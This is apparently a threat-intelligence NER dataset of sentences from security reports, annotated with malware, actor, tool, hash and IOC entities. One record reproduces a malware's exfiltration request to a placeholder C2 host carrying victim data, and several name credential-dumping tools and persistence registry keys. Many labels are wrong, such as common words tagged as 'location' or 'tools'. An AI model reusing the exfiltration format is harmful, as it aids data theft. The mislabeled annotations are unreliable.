vulnerability.","entities":[{"id":47561,"label":"identity","start_offset":5,"end_offset":15},{"id":47562,"label":"identity","start_offset":20,"end_offset":31},{"id":47563,"label":"malware","start_offset":46,"end_offset":51},{"id":47564,"label":"vulnerability","start_offset":76,"end_offset":101}],"relations":[],"Comments":[]} {"id":1584,"text":"Reports indicate that it harvests credentials using Mimikatz and Maarten van Dantzig reports it also uses common hardcoded credentials to spread.","entities":[{"id":45067,"label":"tools","start_offset":52,"end_offset":60},{"id":45068,"label":"identity","start_offset":65,"end_offset":84},{"id":45069,"label":"attack-pattern","start_offset":25,"end_offset":45}],"relations":[{"id":76,"from_id":45069,"to_id":45067,"type":"uses"}],"Comments":[]} {"id":6522,"text":"Password dumping tool out1.exe 79fd822627b72bd2fbe9eae43cf98c99c2ecaa5649b7a3a4cfdc3ef8f977f2e6 HackTool.Win64.Lazagne.","entities":[{"id":20222,"label":"location","start_offset":17,"end_offset":21},{"id":20223,"label":"SHA1","start_offset":31,"end_offset":95}],"relations":[],"Comments":[]} {"id":4416,"text":"The downloaded emails are not sent to the C2.","entities":[],"relations":[],"Comments":[]} {"id":10137,"text":"The other says there is a new file on the company\u2019s OneDrive system.","entities":[],"relations":[],"Comments":[]} {"id":3616,"text":"Spear Phishing is a specific attack technique that has become widely used in the past few years.","entities":[{"id":10910,"label":"attack-pattern","start_offset":0,"end_offset":14}],"relations":[],"Comments":[]} {"id":11986,"text":"We terminated 6 YouTube channels as part of our investigation into coordinated influence operations linked to Kyrgyzstan.","entities":[],"relations":[],"Comments":[]} {"id":13997,"text":"We hope our thorough analysis of Operation Earth Kitsune will help others with data points for attribution in the future.","entities":[{"id":48784,"label":"campaign","start_offset":33,"end_offset":56}],"relations":[],"Comments":[]} {"id":2485,"text":"A majority of these alerts are triggered by testing of the proof-of-concept tools previously mentioned above.","entities":[],"relations":[],"Comments":[]} {"id":5752,"text":"IoT Company Wyze Leaks Emails, Device Data of 2.4M","entities":[],"relations":[],"Comments":[]} {"id":5658,"text":"We use our research to continuously improve the safety and security of our products and share this intelligence with the community to benefit the internet as a whole.","entities":[{"id":17421,"label":"tools","start_offset":48,"end_offset":54},{"id":17422,"label":"location","start_offset":55,"end_offset":58},{"id":17423,"label":"location","start_offset":59,"end_offset":67},{"id":17424,"label":"location","start_offset":84,"end_offset":87},{"id":17425,"label":"location","start_offset":121,"end_offset":130}],"relations":[],"Comments":[]} {"id":9381,"text":" Figure 8.","entities":[],"relations":[],"Comments":[]} {"id":2925,"text":" The operation that Unit 42 has recently uncovered works to deliver XMRig, software that is used to mine the Monero cryptocurrency, to victims\u2019 systems without their knowledge or consent.","entities":[{"id":45744,"label":"identity","start_offset":20,"end_offset":27},{"id":45745,"label":"tools","start_offset":68,"end_offset":73},{"id":45746,"label":"SOFTWARE","start_offset":109,"end_offset":115}],"relations":[],"Comments":[]} {"id":578,"text":"Lastly, we gave an example of ransom operations and updates about top ransomware families.","entities":[],"relations":[],"Comments":[]} {"id":2624,"text":"the","entities":[],"relations":[],"Comments":[]} {"id":2078,"text":" Additionally, this threat actor not only leverages open-source tooling, but also develops his own tools and scripts.","entities":[],"relations":[],"Comments":[]} {"id":2545,"text":"Courses of Action for Conti ransomware.","entities":[{"id":7672,"label":"threat-actor","start_offset":22,"end_offset":27}],"relations":[],"Comments":[]} {"id":10301,"text":"igmtSX.exe IMAP RAT","entities":[],"relations":[],"Comments":[]} {"id":11534,"text":"These campaigns were similar regardless of target, consisting of a credential phishing email with a link to an attacker-controlled phishing page.","entities":[{"id":35327,"label":"location","start_offset":43,"end_offset":49},{"id":35328,"label":"attack-pattern","start_offset":78,"end_offset":86},{"id":35329,"label":"attack-pattern","start_offset":131,"end_offset":139},{"id":35330,"label":"location","start_offset":140,"end_offset":144}],"relations":[],"Comments":[]} {"id":5085,"text":"Attacker-Owned Fake Job Domains: Exploitation URLs:","entities":[],"relations":[],"Comments":[]} {"id":3558,"text":"Examining the Capesand samples The simplified diagram taken from the previous blog shows the combination of ConfuserEx and Cassandra via the second layer of obfuscation protection, which involves the DLL CyaX_Sharp Assembly (both CyaX_Sharp and CyaX are part of the Cassandra protector).","entities":[{"id":49341,"label":"malware","start_offset":14,"end_offset":22},{"id":49342,"label":"tools","start_offset":108,"end_offset":118},{"id":49343,"label":"tools","start_offset":123,"end_offset":132},{"id":49344,"label":"tools","start_offset":230,"end_offset":240},{"id":49345,"label":"tools","start_offset":245,"end_offset":249},{"id":49346,"label":"tools","start_offset":266,"end_offset":285}],"relations":[{"id":787,"from_id":49341,"to_id":49342,"type":"uses"},{"id":788,"from_id":49341,"to_id":49343,"type":"uses"}],"Comments":[]} {"id":5057,"text":"However, for the first time, TAG has observed COLDRIVER campaigns targeting the military of multiple Eastern European countries, as well as a NATO Centre of Excellence.","entities":[{"id":51162,"label":"identity","start_offset":142,"end_offset":167},{"id":51159,"label":"identity","start_offset":29,"end_offset":32},{"id":51160,"label":"threat-actor","start_offset":46,"end_offset":55},{"id":51161,"label":"identity","start_offset":101,"end_offset":127}],"relations":[{"id":1062,"from_id":51160,"to_id":51161,"type":"targets"},{"id":1063,"from_id":51160,"to_id":51162,"type":"targets"}],"Comments":[]} {"id":1451,"text":"In addition, if the attacker can\u2019t create an app with the same name as the targeted app, he or she can still check the \u201cSharedUserId\u201d option.","entities":[],"relations":[],"Comments":[]} {"id":1767,"text":"Although an attacker can use a variety of obfuscation techniques for HTML, we are still able to extract some features to create signatures.","entities":[],"relations":[],"Comments":[]} {"id":13074,"text":"It\u2019s unclear how many of its 5 million user base were affected or how the breach happened.","entities":[],"relations":[],"Comments":[]} {"id":12696,"text":"Parallel to the analysis, tracking, and technical disruption of this botnet, Google has filed a lawsuit against two individuals believed to be located in Russia for operating the Glupteba Botnet and its various criminal schemes.","entities":[{"id":39406,"label":"location","start_offset":36,"end_offset":39},{"id":39410,"label":"malware","start_offset":179,"end_offset":187},{"id":39411,"label":"location","start_offset":195,"end_offset":198}],"relations":[],"Comments":[]} {"id":8998,"text":"From one of the victims where we found an rshell sample, we also found a binary belonging to the Reptile rootkit framework, a rootkit identified as part of the arsenal of Earth Berberoka.","entities":[{"id":27805,"label":"location","start_offset":49,"end_offset":55},{"id":27806,"label":"malware","start_offset":97,"end_offset":104},{"id":27807,"label":"attack-pattern","start_offset":105,"end_offset":112},{"id":27808,"label":"attack-pattern","start_offset":126,"end_offset":133},{"id":27809,"label":"location","start_offset":160,"end_offset":167}],"relations":[],"Comments":[]} {"id":13001,"text":"If the user clicked continue, they would be redirected to an attacker controlled site that collected the users credentials.","entities":[],"relations":[],"Comments":[]} {"id":4765,"text":"However administrators can also use advanced security settings to enhance their users\u2019 protection against suspicious attachments and scripts from untrusted senders.","entities":[],"relations":[],"Comments":[]} {"id":13927,"text":"There is no way to verify this statement, but we know that the group is still quite active.","entities":[],"relations":[],"Comments":[]} {"id":13131,"text":"Even though platforms like the AWS Marketplace have streamlined the process of procurement immeasurably for cloud builders, friction persists.","entities":[{"id":48905,"label":"SOFTWARE","start_offset":31,"end_offset":46}],"relations":[],"Comments":[]} {"id":657,"text":" Ransomware attacks are very common, but they are rarely coupled with an exploit that allows the malware to spread as a network worm.","entities":[],"relations":[],"Comments":[]} {"id":1036,"text":"On August 27, we reported our findings to Taobao.","entities":[{"id":46529,"label":"TIME","start_offset":3,"end_offset":12},{"id":46530,"label":"SOFTWARE","start_offset":42,"end_offset":48}],"relations":[],"Comments":[]} {"id":2022,"text":" The second packer we discovered consists of two layers, with the second being the custom UPX packer discussed above.","entities":[{"id":47119,"label":"tools","start_offset":90,"end_offset":100}],"relations":[],"Comments":[]} {"id":1491,"text":"Unfortunately, many app developers in the Google Play Store have ignored these concerns in favor of convenience.","entities":[{"id":45027,"label":"SOFTWARE","start_offset":42,"end_offset":59}],"relations":[],"Comments":[]} {"id":13609,"text":"The package of downloaded Flash installer ","entities":[],"relations":[],"Comments":[]} {"id":4417,"text":"POST http:\/\/{C2}\/?Key={GUID}&Crc={Identifier} { \"appName\": \"Gmail Downloader\", \"targetname\": \"{Email}\", \"HostName\": \"REDACTED\", \"srcUserIP\": \"REDACTED\", \"actionType\": \"First\", \"timeOccurrence\": \"05\/01\/2022 05:50:31 PM\", \"OS\": \"REDACTED\", \"OSVersion\": \"REDACTED\", \"SystemModel\": \"REDACTED\", \"SystemType\": \"REDACTED\", \"srcName\": \"REDACTED\", \"srcOrgName\": \"REDACTED\" }","entities":[{"id":13209,"label":"URL","start_offset":5,"end_offset":44},{"id":13211,"label":"TIME","start_offset":206,"end_offset":217}],"relations":[],"Comments":[]} {"id":1944,"text":" The documents can also be image files with the same theme, as can be seen here. Multiple Android applications further drive this notion, as they provide services based on the interests of users in that region.","entities":[],"relations":[],"Comments":[]} {"id":4196,"text":"Masquerading: Match Legitimate Name or Location T1197 BITS Jobs T1070.006","entities":[{"id":50000,"label":"attack-pattern","start_offset":14,"end_offset":73}],"relations":[],"Comments":[]} {"id":13869,"text":" The DarkSide ransomware DarkSide offers its RaaS to affiliates for a percentage of the profits.","entities":[],"relations":[],"Comments":[]} {"id":2610,"text":"If Lapsus$ has purchased credentials for a network, they can effectively operate as an insider threat, taking advantage of the same privileges the employee has inside the network. Focus on general information security best practices: MFA, access controls and network segmentation.","entities":[{"id":47792,"label":"threat-actor","start_offset":3,"end_offset":10}],"relations":[],"Comments":[]} {"id":6187,"text":" Figure 5. Malicious script appended on the victim\u2019s email signature Figure 6.","entities":[],"relations":[],"Comments":[]} {"id":5336,"text":"The data follows a specific format.","entities":[],"relations":[],"Comments":[]} {"id":5435,"text":"If a particular vendor has firmware updates that can address a Cyclops Blink attack or any other weakness in the system, organizations should apply these as soon as possible.","entities":[{"id":51435,"label":"malware","start_offset":63,"end_offset":76}],"relations":[],"Comments":[]} {"id":12878,"text":" Figure 4 - Workbench models showing correlated events ready for further investigation.","entities":[],"relations":[],"Comments":[]} {"id":2916,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} {"id":1188,"text":"In-App Purchase (IAP) has become a popular way to sell services and virtual items through mobile applications.","entities":[],"relations":[],"Comments":[]} {"id":5838,"text":"We don't need to [00:07:00] drop the pamphlets out of the plane anymore.","entities":[],"relations":[],"Comments":[]} {"id":2119,"text":"According to both the Apache Foundation and security researcher Man Yue Mo, this vulnerability can enable remote code execution on a server running a vulnerable version of Apache Struts.","entities":[{"id":47257,"label":"identity","start_offset":22,"end_offset":39},{"id":47258,"label":"identity","start_offset":64,"end_offset":74},{"id":47259,"label":"attack-pattern","start_offset":106,"end_offset":127},{"id":47260,"label":"SOFTWARE","start_offset":172,"end_offset":185}],"relations":[],"Comments":[]} {"id":9721,"text":"The figure below shows the example of two of several possible command codes.","entities":[],"relations":[],"Comments":[]} {"id":4580,"text":"Last March it seemed the world came to a stand-still as the COVID-19 pandemic begin to rapidly spread.","entities":[{"id":50431,"label":"TIME","start_offset":0,"end_offset":10}],"relations":[],"Comments":[]} {"id":5207,"text":"The network reflection and amplification vulnerability with bandwidth amplification factor (BAF) is calculated as the ratio between outbound and reflected traffic.","entities":[{"id":51256,"label":"vulnerability","start_offset":4,"end_offset":96}],"relations":[],"Comments":[]} {"id":10877,"text":"June 13, 2021 596257ef017b02ba6961869d78a2317500a45f00c76682a22bbdbd3391857b5d upeg-system-app[.]com Likely repacked from Snaptube.","entities":[{"id":33116,"label":"SHA2","start_offset":15,"end_offset":79},{"id":33117,"label":"location","start_offset":104,"end_offset":110}],"relations":[],"Comments":[]} {"id":10559,"text":"While it\u2019s not unusual to see some fluctuations in these numbers, it could be that attackers, just like many other organizations, are experiencing productivity lags and issues due to global lockdowns and quarantine efforts.","entities":[{"id":32196,"label":"identity","start_offset":94,"end_offset":98},{"id":32197,"label":"location","start_offset":104,"end_offset":108},{"id":32198,"label":"location","start_offset":130,"end_offset":133},{"id":32199,"label":"location","start_offset":165,"end_offset":168},{"id":32200,"label":"location","start_offset":200,"end_offset":203}],"relations":[],"Comments":[]} {"id":3834,"text":"When sending the information, ANEL encrypts the data using blowfish, XOR, and Base64-based encryption methods.","entities":[{"id":11628,"label":"malware","start_offset":30,"end_offset":34}],"relations":[],"Comments":[]} {"id":10144,"text":"In one case we were able to warn the target within two hours after a dedicated credential phishing site was set up.","entities":[{"id":30935,"label":"location","start_offset":7,"end_offset":11},{"id":30936,"label":"location","start_offset":37,"end_offset":43},{"id":30937,"label":"TIME","start_offset":51,"end_offset":60},{"id":30938,"label":"attack-pattern","start_offset":90,"end_offset":98}],"relations":[],"Comments":[]} {"id":14039,"text":"Figure 4 shows the leaked path.","entities":[],"relations":[],"Comments":[]} {"id":4392,"text":"When launched, the tool makes an HTTP GET request to a C2 to check for a response body of \"OK'' and will terminate if it's not found.","entities":[],"relations":[],"Comments":[]} {"id":3961,"text":" Security recommendations","entities":[],"relations":[],"Comments":[]} {"id":429,"text":" When this is done with the visitor\u2019s full knowledge and consent, it\u2019s a fair and reasonable exchange.","entities":[],"relations":[],"Comments":[]} {"id":11017,"text":"Their blog contains write-ups and analysis of vulnerabilities that have been publicly disclosed, including \u201cguest\u201d posts from unwitting legitimate security researchers, likely in an attempt to build additional credibility with other security researchers.","entities":[{"id":33593,"label":"threat-actor","start_offset":26,"end_offset":29},{"id":33594,"label":"location","start_offset":30,"end_offset":33},{"id":33595,"label":"location","start_offset":147,"end_offset":155},{"id":33596,"label":"location","start_offset":169,"end_offset":175},{"id":33597,"label":"location","start_offset":233,"end_offset":241}],"relations":[],"Comments":[]} {"id":1086,"text":"But before we get into the details, here is a quick overview of mutexes and why they exist in the first place.","entities":[],"relations":[],"Comments":[]} {"id":4282,"text":"Figure 12.","entities":[],"relations":[],"Comments":[]} {"id":1204,"text":"According to Wanyx\u2019s website, 12 of the 50 games in Wanyx\u2019s suggested games column contain the discussed IAP SDKs.","entities":[{"id":46596,"label":"identity","start_offset":13,"end_offset":18},{"id":46597,"label":"identity","start_offset":52,"end_offset":58}],"relations":[],"Comments":[]} {"id":7636,"text":"The TA505 group usually attaches a malicious file without any compression.","entities":[],"relations":[],"Comments":[]} {"id":4743,"text":"This industry appears to be thriving.","entities":[],"relations":[],"Comments":[]} {"id":2427,"text":"Early in 2010, CVE-2010-1622 was assigned to a remote code execution vulnerability in the Spring Framework.","entities":[{"id":45513,"label":"vulnerability","start_offset":15,"end_offset":28},{"id":45514,"label":"SOFTWARE","start_offset":90,"end_offset":106},{"id":45515,"label":"attack-pattern","start_offset":47,"end_offset":68},{"id":45512,"label":"TIME","start_offset":0,"end_offset":13}],"relations":[{"id":106,"from_id":45514,"to_id":45513,"type":"has"},{"id":107,"from_id":45515,"to_id":45513,"type":"uses"}],"Comments":[]} {"id":247,"text":"Once a user opens the website in the browser, it starts making requests to various Ukrainian news sites and lists the number of requests made to each new site on the home page, as shown in Figure 12 below.","entities":[{"id":45945,"label":"identity","start_offset":83,"end_offset":103}],"relations":[],"Comments":[]} {"id":6810,"text":" hxxp:\/\/{FQDN}\/{computer name}_{hexadecimal volume serial number}\/help_{day}_{month}[.]php Conclusion Gameradon is not the first group to take advantage of the Covid-19 topic.","entities":[],"relations":[],"Comments":[]} {"id":7432,"text":"Because of these policies, experienced actor groups like Pawn Storm can take advantage of OAuth for their credential phishing schemes.","entities":[{"id":23115,"label":"location","start_offset":68,"end_offset":71},{"id":23116,"label":"attack-pattern","start_offset":117,"end_offset":125}],"relations":[],"Comments":[]} {"id":14075,"text":"However, our analysis shows further similarities that imply correlation.","entities":[],"relations":[],"Comments":[]} {"id":1845,"text":"DeviceIoControl as an argument with the current process ID ","entities":[],"relations":[],"Comments":[]} {"id":9,"text":" Palo Alto Networks Enterprise Security Platform offers multilayer protection to prevent this attack along with other attacks without the need for prior knowledge of the specific attack.","entities":[{"id":31,"label":"identity","start_offset":1,"end_offset":19}],"relations":[],"Comments":[]} {"id":6490,"text":"Using a UPX unpacker, we were able to extract the contents, which consists of a Python executable.","entities":[],"relations":[],"Comments":[]} {"id":4664,"text":"The language is returned to its original setting when the run is finished.","entities":[],"relations":[],"Comments":[]} {"id":6403,"text":"Expanding our research beyond the two samples discussed above, we have also identified an additional seven samples of BRc4 dating back to February 2021.","entities":[{"id":19870,"label":"tools","start_offset":118,"end_offset":122}],"relations":[],"Comments":[]} {"id":14230,"text":"The beginning and end markers, DZKS and DZJS, are typical in PlugX. A closer look, however, shows that the decryption algorithm is different from PlugX.","entities":[{"id":48416,"label":"malware","start_offset":146,"end_offset":151},{"id":48415,"label":"malware","start_offset":61,"end_offset":66}],"relations":[],"Comments":[]} {"id":9839,"text":"First stage: Information collection 2.","entities":[],"relations":[],"Comments":[]} {"id":7892,"text":"But when April 2017 came, Rig started a very marked decline.","entities":[],"relations":[],"Comments":[]} {"id":3913,"text":"Microsoft issued a patch for this vulnerability in February 2020.","entities":[{"id":49768,"label":"TIME","start_offset":52,"end_offset":65},{"id":49767,"label":"identity","start_offset":0,"end_offset":9}],"relations":[],"Comments":[]} {"id":3550,"text":"In November 2019, we published a blog analyzing an exploit kit we named Capesand that exploited Adobe Flash and Microsoft Internet Explorer flaws.","entities":[{"id":49331,"label":"TIME","start_offset":3,"end_offset":16},{"id":49332,"label":"malware","start_offset":72,"end_offset":80},{"id":49333,"label":"SOFTWARE","start_offset":96,"end_offset":107},{"id":49334,"label":"SOFTWARE","start_offset":112,"end_offset":139}],"relations":[{"id":784,"from_id":49332,"to_id":49333,"type":"exploits"},{"id":785,"from_id":49332,"to_id":49334,"type":"exploits"}],"Comments":[]} {"id":13146,"text":"Tropic Trooper, a threat actor group that targets government, military, healthcare, transportation, and high-tech industries in Taiwan, the Philippines, and Hong Kong, has been active since 2011.","entities":[{"id":48920,"label":"identity","start_offset":104,"end_offset":124},{"id":48922,"label":"location","start_offset":140,"end_offset":151},{"id":48924,"label":"TIME","start_offset":184,"end_offset":194},{"id":48916,"label":"identity","start_offset":50,"end_offset":60},{"id":48921,"label":"location","start_offset":128,"end_offset":134},{"id":48915,"label":"threat-actor","start_offset":0,"end_offset":14},{"id":48917,"label":"identity","start_offset":62,"end_offset":70},{"id":48918,"label":"identity","start_offset":72,"end_offset":82},{"id":48919,"label":"identity","start_offset":84,"end_offset":98},{"id":48923,"label":"location","start_offset":157,"end_offset":166}],"relations":[{"id":491,"from_id":48920,"to_id":48921,"type":"located-at"},{"id":492,"from_id":48916,"to_id":48921,"type":"located-at"},{"id":487,"from_id":48915,"to_id":48917,"type":"targets"},{"id":488,"from_id":48915,"to_id":48918,"type":"targets"},{"id":489,"from_id":48915,"to_id":48919,"type":"targets"},{"id":494,"from_id":48916,"to_id":48922,"type":"located-at"},{"id":495,"from_id":48916,"to_id":48923,"type":"located-at"},{"id":496,"from_id":48917,"to_id":48921,"type":"located-at"},{"id":497,"from_id":48915,"to_id":48916,"type":"targets"},{"id":498,"from_id":48915,"to_id":48924,"type":"related-to"},{"id":493,"from_id":48918,"to_id":48922,"type":"targets"}],"Comments":[]} {"id":3238,"text":" A second HTTP server will also be created to listen on one of the aforementioned port numbers.","entities":[],"relations":[],"Comments":[]} {"id":1597,"text":"The first version of Funtasy we detected is a fake television remote control application.","entities":[{"id":46844,"label":"malware","start_offset":21,"end_offset":28}],"relations":[],"Comments":[]} {"id":830,"text":" Palo Alto Networks will update this Threat Brief with new information and recommendations as they become available. CVE-2020-0601: The ChainOfFools\/CurveBall Attack Explained POC Win10 Crypto Vulnerability: Cheating in Elliptic Curve Billiards 2 NSA Cybersecurity Advisory Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[{"id":46383,"label":"identity","start_offset":250,"end_offset":253},{"id":46384,"label":"vulnerability","start_offset":137,"end_offset":149},{"id":46381,"label":"vulnerability","start_offset":118,"end_offset":131},{"id":46382,"label":"SOFTWARE","start_offset":182,"end_offset":187},{"id":46380,"label":"identity","start_offset":1,"end_offset":19},{"id":46385,"label":"vulnerability","start_offset":150,"end_offset":159}],"relations":[],"Comments":[]} {"id":8602,"text":"Code signatures on Windows executables provide guarantees about the integrity of a signed executable, as well as information about the identity of the signer.","entities":[],"relations":[],"Comments":[]} {"id":12303,"text":"We terminated 22 YouTube channels as part of our ongoing investigation into coordinated influence operations linked to Indonesia.","entities":[],"relations":[],"Comments":[]} {"id":13063,"text":"The Malware that Usually Installs Ransomware and You Need to Remove Right Away","entities":[],"relations":[],"Comments":[]} {"id":652,"text":"In reality, the malware is encrypting the NTFS Master File Table in the background.","entities":[],"relations":[],"Comments":[]} {"id":9705,"text":"The highlighted bytes represent the scrambled computer info Figure 22.","entities":[],"relations":[],"Comments":[]} {"id":488,"text":" How it Works ","entities":[],"relations":[],"Comments":[]} {"id":11726,"text":" ED5E1D6E914DE64A203F2F32AB95176FC7EFFF3A520915971D5FE748E79D611C","entities":[{"id":36131,"label":"SHA2","start_offset":1,"end_offset":65}],"relations":[],"Comments":[]} {"id":3502,"text":"Based on the controller\u2019s behavior, we can posit that both Marade and Protux were authored by the same threat actors.","entities":[{"id":49298,"label":"malware","start_offset":70,"end_offset":76},{"id":49297,"label":"malware","start_offset":59,"end_offset":65}],"relations":[{"id":780,"from_id":49297,"to_id":49298,"type":"variant-of"}],"Comments":[]} {"id":6944,"text":" Figure 7.","entities":[],"relations":[],"Comments":[]} {"id":8994,"text":"However, as the rshell sample was found in 2021, we initially did not find this correlation strong enough to attribute the rshellmalware family to Iron Tiger.","entities":[{"id":27790,"label":"location","start_offset":23,"end_offset":29},{"id":27792,"label":"location","start_offset":92,"end_offset":98},{"id":27793,"label":"threat-actor","start_offset":147,"end_offset":157}],"relations":[],"Comments":[]} {"id":2122,"text":"A successful attack would run code in the security context that Struts is using.","entities":[{"id":47261,"label":"SOFTWARE","start_offset":64,"end_offset":70}],"relations":[],"Comments":[]} {"id":1253,"text":"[1] These attacks took place between January and March of 2015.","entities":[{"id":46630,"label":"TIME","start_offset":37,"end_offset":62}],"relations":[],"Comments":[]} {"id":4104,"text":"Encrypted configuration file ","entities":[],"relations":[],"Comments":[]} {"id":9487,"text":"Another malware family that we obtained both Windows and macOS samples of during our investigation was oRAT.","entities":[{"id":29125,"label":"location","start_offset":53,"end_offset":56},{"id":29126,"label":"malware","start_offset":103,"end_offset":107}],"relations":[],"Comments":[]} {"id":11121,"text":"In previous posts, we discussed targeting of health organizations as well as attacker efforts to impersonate the World Health Organization.","entities":[],"relations":[],"Comments":[]} {"id":5860,"text":"Such as the term mercenary, right?","entities":[],"relations":[],"Comments":[]} {"id":6661,"text":"This post is also available in: \u65e5\u672c\u8a9e (Japanese) Palo Alto Networks Unit 42 threat intelligence team has just released new research that has uncovered a previously unknown second wave of Shamoon 2 attacks: Second Wave of Shamoon 2 Attacks Identified Based on our analysis, these attacks were timed to occur on November 29, 2016, twelve days after the initial Shamoon 2 attacks that we wrote about previously. ","entities":[{"id":20662,"label":"location","start_offset":5,"end_offset":9},{"id":20664,"label":"identity","start_offset":53,"end_offset":71},{"id":20665,"label":"identity","start_offset":72,"end_offset":79},{"id":20666,"label":"identity","start_offset":109,"end_offset":113},{"id":20668,"label":"tools","start_offset":191,"end_offset":198},{"id":20669,"label":"malware","start_offset":225,"end_offset":232},{"id":20672,"label":"tools","start_offset":364,"end_offset":371}],"relations":[],"Comments":[]} {"id":471,"text":"But it is an important piece that enables modern malware to try and evade security products and countermeasures.","entities":[],"relations":[],"Comments":[]} {"id":11039,"text":"Host IOCs Registry Keys HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\KernelConfig HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\DriverConfig HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\SSL Update File Paths C:\\Windows\\System32\\Nwsapagent.sys C:\\Windows\\System32\\helpsvc.sys C:\\ProgramData\\USOShared\\uso.bin C:\\ProgramData\\VMware\\vmnat-update.bin C:\\ProgramData\\VirtualBox\\update.bin","entities":[{"id":33653,"label":"location","start_offset":0,"end_offset":4},{"id":33654,"label":"REGISTRYKEY","start_offset":24,"end_offset":83},{"id":33655,"label":"REGISTRYKEY","start_offset":84,"end_offset":143},{"id":33656,"label":"REGISTRYKEY","start_offset":144,"end_offset":198}],"relations":[],"Comments":[]} {"id":1359,"text":"Using our PoC, we created the following demonstration video of how a malicious actor would exploit the CVE-2021-32648 vulnerability, log into the compromised OctoberCMS account and to deface a web page hosted by the server:","entities":[{"id":44975,"label":"vulnerability","start_offset":103,"end_offset":117},{"id":44976,"label":"SOFTWARE","start_offset":158,"end_offset":168}],"relations":[{"id":49,"from_id":44976,"to_id":44975,"type":"has"}],"Comments":[]} {"id":4370,"text":" URLs\/Domains\/IP Addresses Server hosting malicious documents parinari[.]xyz Server used for file exfiltration pirnaram[.]xyz Domain names linked to other campaigns","entities":[{"id":50157,"label":"DOMAIN","start_offset":73,"end_offset":87},{"id":50158,"label":"DOMAIN","start_offset":124,"end_offset":138}],"relations":[],"Comments":[]} {"id":1824,"text":"It installs the driver file in preparation for disabling the running antivirus product.","entities":[],"relations":[],"Comments":[]} {"id":13711,"text":"It uses Writing Style DNA to detect BEC impersonations and computer vision to find credential-stealing phishing sites.","entities":[{"id":51759,"label":"attack-pattern","start_offset":103,"end_offset":111},{"id":51758,"label":"attack-pattern","start_offset":83,"end_offset":102}],"relations":[],"Comments":[]} {"id":10499,"text":"We look forward to continuing our work in this space and advancing the safety and security of our users around the world.","entities":[{"id":31920,"label":"location","start_offset":53,"end_offset":56},{"id":31921,"label":"tools","start_offset":71,"end_offset":77},{"id":31922,"label":"location","start_offset":78,"end_offset":81},{"id":31923,"label":"location","start_offset":82,"end_offset":90},{"id":31924,"label":"location","start_offset":115,"end_offset":120}],"relations":[],"Comments":[]} {"id":11249,"text":"We\u2019ll also continue to apply those findings internally to improve the safety and security of our products so we can effectively combat threats and protect users who rely on our services.","entities":[{"id":34385,"label":"tools","start_offset":70,"end_offset":76},{"id":34386,"label":"location","start_offset":77,"end_offset":80},{"id":34387,"label":"location","start_offset":81,"end_offset":89},{"id":34388,"label":"location","start_offset":112,"end_offset":115},{"id":34389,"label":"location","start_offset":143,"end_offset":146}],"relations":[],"Comments":[]} {"id":2910,"text":"Additionally, each sample uses a Sound object named \u2018snd\u2019 to gain control, and they all invoke the function toString(). ","entities":[],"relations":[],"Comments":[]} {"id":563,"text":"Based on the way Virlock spreads the ransom amount it demands, it is likely designed to target consumers or home users.","entities":[{"id":46173,"label":"malware","start_offset":17,"end_offset":24}],"relations":[],"Comments":[]} {"id":3207,"text":"After the hex decoding of the arguments, we get a Python one-liner that downloads additional Python scripts from the cloud.","entities":[{"id":48335,"label":"SOFTWARE","start_offset":50,"end_offset":56},{"id":48336,"label":"SOFTWARE","start_offset":93,"end_offset":100}],"relations":[],"Comments":[]} {"id":14214,"text":"It copies itself on %WINDIR%\\system32\\wbem\\ and replaces the original DLL.","entities":[{"id":48240,"label":"FILEPATH","start_offset":20,"end_offset":43}],"relations":[],"Comments":[]} {"id":13679,"text":"The originating IP of Water Nue\u2019s test\/deployment machine was left in a clear text file in the phishing site\u2019s server for collected credentials.","entities":[{"id":51751,"label":"campaign","start_offset":22,"end_offset":33},{"id":42553,"label":"attack-pattern","start_offset":95,"end_offset":103}],"relations":[],"Comments":[]} {"id":2497,"text":"Cortex XDR Pro customers also have visibility into post-exploitation activities and can specifically track the \u201cProcess execution with a suspicious command line indicative of the Spring4Shell exploit\u201d and \u201cSuspicious HTTP Request to a vulnerable Java class\u201d Analytics BIOCs.","entities":[{"id":47598,"label":"vulnerability","start_offset":206,"end_offset":256},{"id":47599,"label":"vulnerability","start_offset":112,"end_offset":199},{"id":47594,"label":"SOFTWARE","start_offset":0,"end_offset":14}],"relations":[],"Comments":[]} {"id":11593,"text":"The configuration is encoded with a 105-byte XOR key.","entities":[],"relations":[],"Comments":[]} {"id":10754,"text":"Additionally, we also found that the steganography algorithm (alternative base64 + RC4) between XXMM and Daserf were the same.","entities":[{"id":32862,"label":"location","start_offset":88,"end_offset":95},{"id":32863,"label":"malware","start_offset":96,"end_offset":100},{"id":32864,"label":"location","start_offset":101,"end_offset":104},{"id":32866,"label":"location","start_offset":121,"end_offset":125}],"relations":[],"Comments":[]} {"id":2345,"text":"Having a loader and a payload ready, we set out to test the exploit on a fresh install of Catalina (10.15) since it was the version in which we were served the full exploit chain.","entities":[{"id":47400,"label":"SOFTWARE","start_offset":90,"end_offset":106}],"relations":[],"Comments":[]} {"id":14221,"text":"When it is loaded by the system, DLLMain decrypts the payload via CryptUnprotectData.","entities":[{"id":48251,"label":"tools","start_offset":66,"end_offset":84},{"id":48252,"label":"malware","start_offset":33,"end_offset":41}],"relations":[{"id":395,"from_id":48252,"to_id":48251,"type":"uses"}],"Comments":[]} {"id":10313,"text":".Win32.TRX.XXPE50FFF039","entities":[],"relations":[],"Comments":[]} {"id":4871,"text":"The attacker would then use a custom tool to download the mailbox contents via IMAP.","entities":[],"relations":[],"Comments":[]} {"id":2695,"text":"Palo Alto Networks detects and prevents LockBit 2.0 ransomware in the following ways:","entities":[{"id":47928,"label":"identity","start_offset":0,"end_offset":18},{"id":47929,"label":"threat-actor","start_offset":40,"end_offset":51}],"relations":[],"Comments":[]} {"id":2797,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} {"id":4271,"text":"The backdoors also linked to an infrastructure matching old Hangover domains as well as the infrastructure of domains from the September 2016 blog post.","entities":[{"id":50074,"label":"TIME","start_offset":127,"end_offset":141},{"id":50075,"label":"threat-actor","start_offset":60,"end_offset":68}],"relations":[],"Comments":[]} {"id":101,"text":"In our first half report, we highlight an APT group named TeamTNT that has been targeting clouds for quite a while 